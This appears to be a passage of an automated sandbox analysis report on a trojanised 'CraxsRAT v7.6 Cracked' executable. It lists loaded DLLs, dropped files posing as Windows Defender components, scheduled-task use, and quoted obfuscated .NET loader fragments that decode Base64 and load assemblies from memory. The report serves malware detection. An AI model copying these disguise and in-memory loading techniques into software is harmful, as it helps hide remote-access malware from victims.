Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Section loaded: cryptbase.dll

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InprocServer32

Jump to behavior

Source: Windows Defender Notification.lnk.10.dr

LNK file: ..\..\..\..\..\Windows Defender Notification.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: CraxsRAT v7.6 Cracked.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: CraxsRAT v7.6 Cracked.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: CraxsRAT v7.6 Cracked.exe

Static file information: File size 89198592 > 1048576

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source: CraxsRAT v7.6 Cracked.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x5507000

Source: CraxsRAT v7.6 Cracked.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: Windows Defender Notification.exe.0.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.NBX8pyB6D1KtT7wuPVqHEBUua44mcQ5RKbZLjcd49sXZN1av4ROWjx6rGTaiFD1b1F4r7DFEZI78UN3qmKP,SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.J8RZNwWq4rG8iscgmRyWEjOP42wZiYt90vKSSGSpfev6LGwro890ZBh9Ffsu0qYFi9PRvp0WwQ1wOURg05q,SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.rxQJJqtKmPXhjiux4vt2fRyYMqYq4QzxkejWBUiQAQPd45Wv7EDidwPuvHEx7EIs1GIarcDk1ASAJNdxW6P,SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.QBSa0yh9tK0ZxGq551kzWifMvsrHUBAzVONPluFc2vksdnBRDmMuA712W6MT4bDKrOZAc9IvpF77Fd6NhDn,wBRYVJsNSz.rwhwYlQjYm()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Windows Defender Notification.exe.0.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{FeJFuenwmc8NBkpuKslAVJKAH49AF3Vqq02YPCnT1b3LGNYyHauftO7bOl3v7jrlw7dc[2],wBRYVJsNSz.JvLjNAOTTk(Convert.FromBase64String(FeJFuenwmc8NBkpuKslAVJKAH49AF3Vqq02YPCnT1b3LGNYyHauftO7bOl3v7jrlw7dc[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.NBX8pyB6D1KtT7wuPVqHEBUua44mcQ5RKbZLjcd49sXZN1av4ROWjx6rGTaiFD1b1F4r7DFEZI78UN3qmKP,SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.J8RZNwWq4rG8iscgmRyWEjOP42wZiYt90vKSSGSpfev6LGwro890ZBh9Ffsu0qYFi9PRvp0WwQ1wOURg05q,SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.rxQJJqtKmPXhjiux4vt2fRyYMqYq4QzxkejWBUiQAQPd45Wv7EDidwPuvHEx7EIs1GIarcDk1ASAJNdxW6P,SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.QBSa0yh9tK0ZxGq551kzWifMvsrHUBAzVONPluFc2vksdnBRDmMuA712W6MT4bDKrOZAc9IvpF77Fd6NhDn,wBRYVJsNSz.rwhwYlQjYm()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{FeJFuenwmc8NBkpuKslAVJKAH49AF3Vqq02YPCnT1b3LGNYyHauftO7bOl3v7jrlw7dc[2],wBRYVJsNSz.JvLjNAOTTk(Convert.FromBase64String(FeJFuenwmc8NBkpuKslAVJKAH49AF3Vqq02YPCnT1b3LGNYyHauftO7bOl3v7jrlw7dc[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Windows Defender Notification.exe.10.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.NBX8pyB6D1KtT7wuPVqHEBUua44mcQ5RKbZLjcd49sXZN1av4ROWjx6rGTaiFD1b1F4r7DFEZI78UN3qmKP,SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.J8RZNwWq4rG8iscgmRyWEjOP42wZiYt90vKSSGSpfev6LGwro890ZBh9Ffsu0qYFi9PRvp0WwQ1wOURg05q,SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.rxQJJqtKmPXhjiux4vt2fRyYMqYq4QzxkejWBUiQAQPd45Wv7EDidwPuvHEx7EIs1GIarcDk1ASAJNdxW6P,SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.QBSa0yh9tK0ZxGq551kzWifMvsrHUBAzVONPluFc2vksdnBRDmMuA712W6MT4bDKrOZAc9IvpF77Fd6NhDn,wBRYVJsNSz.rwhwYlQjYm()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Windows Defender Notification.exe.10.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{FeJFuenwmc8NBkpuKslAVJKAH49AF3Vqq02YPCnT1b3LGNYyHauftO7bOl3v7jrlw7dc[2],wBRYVJsNSz.JvLjNAOTTk(Convert.FromBase64String(FeJFuenwmc8NBkpuKslAVJKAH49AF3Vqq02YPCnT1b3LGNYyHauftO7bOl3v7jrlw7dc[3]))}}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: Windows Defender Notification.exe.0.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	.Net Code: _7ru7O3n5ZVdLBXiksXsbR4olcSckF1OFjjaeHMWTgjjDUM3Ildfg2shLI9lfp9JwHjx7 System.AppDomain.Load(byte[])
Source: Windows Defender Notification.exe.0.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	.Net Code: _2P3FPJYywB4HqnqgJkMkawJkxLGz6eDq31uKIErLcfr5IbxOyKJ2VudLQmOe54AUX0Yj System.AppDomain.Load(byte[])
Source: Windows Defender Notification.exe.0.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	.Net Code: _2P3FPJYywB4HqnqgJkMkawJkxLGz6eDq31uKIErLcfr5IbxOyKJ2VudLQmOe54AUX0Yj
Source: Windows Defender Real Time Protection.exe.0.dr, OK.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, OK.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	.Net Code: _7ru7O3n5ZVdLBXiksXsbR4olcSckF1OFjjaeHMWTgjjDUM3Ildfg2shLI9lfp9JwHjx7 System.AppDomain.Load(byte[])
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	.Net Code: _2P3FPJYywB4HqnqgJkMkawJkxLGz6eDq31uKIErLcfr5IbxOyKJ2VudLQmOe54AUX0Yj System.AppDomain.Load(byte[])
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	.Net Code: _2P3FPJYywB4HqnqgJkMkawJkxLGz6eDq31uKIErLcfr5IbxOyKJ2VudLQmOe54AUX0Yj
Source: 0e75fed00639ea9e725255499292dcdd.exe.2.dr, OK.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: Windows Defender Notification.exe.10.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	.Net Code: _7ru7O3n5ZVdLBXiksXsbR4olcSckF1OFjjaeHMWTgjjDUM3Ildfg2shLI9lfp9JwHjx7 System.AppDomain.Load(byte[])
Source: Windows Defender Notification.exe.10.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	.Net Code: _2P3FPJYywB4HqnqgJkMkawJkxLGz6eDq31uKIErLcfr5IbxOyKJ2VudLQmOe54AUX0Yj System.AppDomain.Load(byte[])
Source: Windows Defender Notification.exe.10.dr, SH9Ubl5fU59TPlDQ1IviVoAyTfc5VL8eCro63grvn6KHYrXU4jEq3mysgPyAIU1QKLrx.cs	.Net Code: _2P3FPJYywB4HqnqgJkMkawJkxLGz6eDq31uKIErLcfr5IbxOyKJ2VudLQmOe54AUX0Yj

Binary contains a suspicious time stamp

Source: CraxsRat.exe.0.dr

Static PE information: 0xF9BEEE5F [Wed Oct 11 19:54:07 2102 UTC]

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Code function: 10_2_00007FF848F200BD pushad ; iretd	10_2_00007FF848F200C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FF848E1D2A5 pushad ; iretd	16_2_00007FF848E1D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FF848F3B238 push esp; retf 4810h	16_2_00007FF848F3B2A7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FF848F3B9FA push E85A9AD7h; ret	16_2_00007FF848F3BAF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FF849002316 push 8B485F92h; iretd	16_2_00007FF84900231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_00007FF848E2D2A5 pushad ; iretd	19_2_00007FF848E2D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_00007FF848F4120A push E95BD305h; ret	19_2_00007FF848F41239
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_00007FF848F419DB pushad ; ret	19_2_00007FF848F419E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_00007FF849012316 push 8B485F91h; iretd	19_2_00007FF84901231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FF848E2D2A5 pushad ; iretd	21_2_00007FF848E2D2A6
